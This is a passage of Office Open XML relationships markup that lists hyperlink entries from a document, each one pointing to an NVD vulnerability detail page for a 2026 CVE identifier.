Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55694" TargetMode="External" Id="rId3137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56702" TargetMode="External" Id="rId3138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58262" TargetMode="External" Id="rId3139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59184" TargetMode="External" Id="rId3140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59186" TargetMode="External" Id="rId3141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59187" TargetMode="External" Id="rId3142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59189" TargetMode="External" Id="rId3143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59981" TargetMode="External" Id="rId3144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59982" TargetMode="External" Id="rId3145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62315" TargetMode="External" Id="rId3146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62680" TargetMode="External" Id="rId3147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63177" TargetMode="External" Id="rId3148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63652" TargetMode="External" Id="rId3149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64379" TargetMode="External" Id="rId3150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64816" TargetMode="External" Id="rId3151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64826" TargetMode="External" Id="rId3152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65934" TargetMode="External" Id="rId3153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65981" TargetMode="External" Id="rId3154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66003" TargetMode="External" Id="rId3155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66060" TargetMode="External" Id="rId3156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66061" TargetMode="External" Id="rId3157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66305" TargetMode="External" Id="rId3158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67199" TargetMode="External" Id="rId3159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67329" TargetMode="External" Id="rId3160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67337" TargetMode="External" Id="rId3161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68513" TargetMode="External" Id="rId3162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68515" TargetMode="External" Id="rId3163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68553" TargetMode="External" Id="rId3164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68835" TargetMode="External" Id="rId3165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68846" TargetMode="External" Id="rId3166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68889" TargetMode="External" Id="rId3167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68893" TargetMode="External" Id="rId3168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69093" TargetMode="External" Id="rId3169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69244" TargetMode="External" Id="rId3170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69262" TargetMode="External" Id="rId3171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69272" TargetMode="External" Id="rId3172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69274" TargetMode="External" Id="rId3173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69296" TargetMode="External" Id="rId3174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69305" TargetMode="External" Id="rId3175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69313" TargetMode="External" Id="rId3176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69314" TargetMode="External" Id="rId3177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69336" TargetMode="External" Id="rId3178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69337" TargetMode="External" Id="rId3179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69338" TargetMode="External" Id="rId3180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69340" TargetMode="External" Id="rId3181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69357" TargetMode="External" Id="rId3182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69358" TargetMode="External" Id="rId3183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69364" TargetMode="External" Id="rId3184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69366" TargetMode="External" Id="rId3185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69384" TargetMode="External" Id="rId3186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69396" TargetMode="External" Id="rId3187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69451" TargetMode="External" Id="rId3188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69460" TargetMode="External" Id="rId3189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69482" TargetMode="External" Id="rId3190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69536" TargetMode="External" Id="rId3191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69553" TargetMode="External" Id="rId3192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69597" TargetMode="External" Id="rId3193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69602" TargetMode="External" Id="rId3194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69688" TargetMode="External" Id="rId3195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69706" TargetMode="External" Id="rId3196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69757" TargetMode="External" Id="rId3197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69761" TargetMode="External" Id="rId3198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69775" TargetMode="External" Id="rId3199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70462" TargetMode="External" Id="rId3200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70471" TargetMode="External" Id="rId3201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70472" TargetMode="External" Id="rId3202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70475" TargetMode="External" Id="rId3203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70485" TargetMode="External" Id="rId3204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71415" TargetMode="External" Id="rId3205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71505" TargetMode="External" Id="rId3206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71507" TargetMode="External" Id="rId3207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71508" TargetMode="External" Id="rId3208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71509" TargetMode="External" Id="rId3209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71510" TargetMode="External" Id="rId3210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71511" TargetMode="External" Id="rId3211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71553" TargetMode="External" Id="rId3212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71556" TargetMode="External" Id="rId3213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71964" TargetMode="External" Id="rId3214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72694" TargetMode="External" Id="rId3215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72731" TargetMode="External" Id="rId3216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72774" TargetMode="External" Id="rId3217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72838" TargetMode="External" Id="rId3218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72909" TargetMode="External" Id="rId3219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72910" TargetMode="External" Id="rId3220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73074" TargetMode="External" Id="rId3221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73215" TargetMode="External" Id="rId3222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73266" TargetMode="External" Id="rId3223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73321" TargetMode="External" Id="rId3224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73331" TargetMode="External" Id="rId3225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74039" TargetMode="External" Id="rId3226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74237" TargetMode="External" Id="rId3227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74881" TargetMode="External" Id="rId3228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75002" TargetMode="External" Id="rId3229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75132" TargetMode="External" Id="rId3230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75369" TargetMode="External" Id="rId3231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75830" TargetMode="External" Id="rId3232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75846" TargetMode="External" Id="rId3233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76223" TargetMode="External" Id="rId3234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77125" TargetMode="External" Id="rId3235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77611" TargetMode="External" Id="rId3236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77847" TargetMode="External" Id="rId3237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77939" TargetMode="External" Id="rId3238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78083" TargetMode="External" Id="rId3239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78134" TargetMode="External" Id="rId3240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79617" TargetMode="External" Id="rId3241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79745" TargetMode="External" Id="rId3242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79747" TargetMode="External" Id="rId3243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79754" TargetMode="External" Id="rId3244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79775" TargetMode="External" Id="rId3245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80183" TargetMode="External" Id="rId3246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80380" TargetMode="External" Id="rId3247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81330" TargetMode="External" Id="rId3248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81404" TargetMode="External" Id="rId3249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81781" TargetMode="External" Id="rId3250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81783" TargetMode="External" Id="rId3251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81795" TargetMode="External" Id="rId3252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81798" TargetMode="External" Id="rId3253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82052" TargetMode="External" Id="rId3254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82054" TargetMode="External" Id="rId3255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82055" TargetMode="External" Id="rId3256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82057" TargetMode="External" Id="rId3257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82058" TargetMode="External" Id="rId3258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82065" TargetMode="External" Id="rId3259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82068" TargetMode="External" Id="rId3260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82070" TargetMode="External" Id="rId3261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82073" TargetMode="External" Id="rId3262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82074" TargetMode="External" Id="rId3263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82076" TargetMode="External" Id="rId3264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82392" TargetMode="External" Id="rId3265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82634" TargetMode="External" Id="rId3266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82659" TargetMode="External" Id="rId3267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82864" TargetMode="External" Id="rId3268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82872" TargetMode="External" Id="rId3269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82877" TargetMode="External" Id="rId3270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83961" TargetMode="External" Id="rId3271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84192" TargetMode="External" Id="rId3272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84204" TargetMode="External" Id="rId3273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84205" TargetMode="External" Id="rId3274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84698" TargetMode="External" Id="rId3275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84816" TargetMode="External" Id="rId3276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84817" TargetMode="External" Id="rId3277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84818" TargetMode="External" Id="rId3278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84819" TargetMode="External" Id="rId3279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84820" TargetMode="External" Id="rId3280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84989" TargetMode="External" Id="rId3281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85089" TargetMode="External" Id="rId3282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85093" TargetMode="External" Id="rId3283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85162" TargetMode="External" Id="rId3284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85163" TargetMode="External" Id="rId3285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85164" TargetMode="External" Id="rId3286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85170" TargetMode="External" Id="rId3287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85171" TargetMode="External" Id="rId3288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85389" TargetMode="External" Id="rId3289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85390" TargetMode="External" Id="rId3290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85451" TargetMode="External" Id="rId3291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85545" TargetMode="External" Id="rId3292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85578" TargetMode="External" Id="rId3293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85580" TargetMode="External" Id="rId3294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85582" TargetMode="External" Id="rId3295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85583" TargetMode="External" Id="rId3296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85590" TargetMode="External" Id="rId3297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85591" TargetMode="External" Id="rId3298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85603" TargetMode="External" Id="rId3299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85618" TargetMode="External" Id="rId3300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85624" 